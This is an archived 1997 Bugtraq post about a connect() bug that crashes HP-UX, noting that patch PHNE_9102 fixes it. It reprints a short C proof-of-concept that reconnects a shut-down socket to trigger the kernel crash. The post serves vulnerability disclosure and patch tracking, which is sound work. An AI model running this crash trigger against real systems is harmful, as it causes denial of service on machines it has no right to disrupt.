OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
Bugtraq archives for 1st quarter (Jan-Mar) 1997: Re: Bug in connect() ?

Re: Bug in connect() ?

Frank Hofmann (hofmannWPAX01.PHYSIK.UNI-WUERZBURG.DE)
Mon, 10 Mar 1997 20:25:58 +0100

On Fri, 7 Mar 1997, Frank Hofmann wrote:

[ ... ]
> I'm gonna try some recent HP patches as I had one report that HP/UX 9.05
> is vulnerable and one that it is not. Perhaps it's fixed and I'm missing
> the patch.

I indeed did miss the patch. For my 10.01 box, PHNE_9102 (ARPA transport
cumulative patch) fixes the crash. I did not have this installed as I
thought it to be mostly identical to the earlier PHNE_9032 (remember the
ping attack ?). Obviously it is not.
Someone tried the corresponding patches on other HP/UX versions ?

Bye,
Frank Hofmann


Here's the code again, for those having missed the original posting:

-------------------------------------------------------------------------
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <sys/time.h>
#include <netdb.h>
#include <stdio.h>

main(int argc, char **argv)
{
    int sock;
    struct sockaddr_in server;
    struct hostent *hp;

    if (argc > 3) exit(-1);

    sock = socket(AF_INET, SOCK_STREAM, 0);
    hp = gethostbyname("localhost");
    bcopy((char*)hp->h_addr, (char*)&server.sin_addr, hp->h_length);
    server.sin_family = AF_INET;
    server.sin_port = (argc >= 2) ? atoi(argv[1]) : 23;
    connect(sock, (struct sockaddr *)&server, sizeof server);
    shutdown(sock, 2);
    server.sin_port = (argc == 3) ? atoi(argv[2]) : 24;
    connect(sock, (struct sockaddr *)&server, sizeof server);
}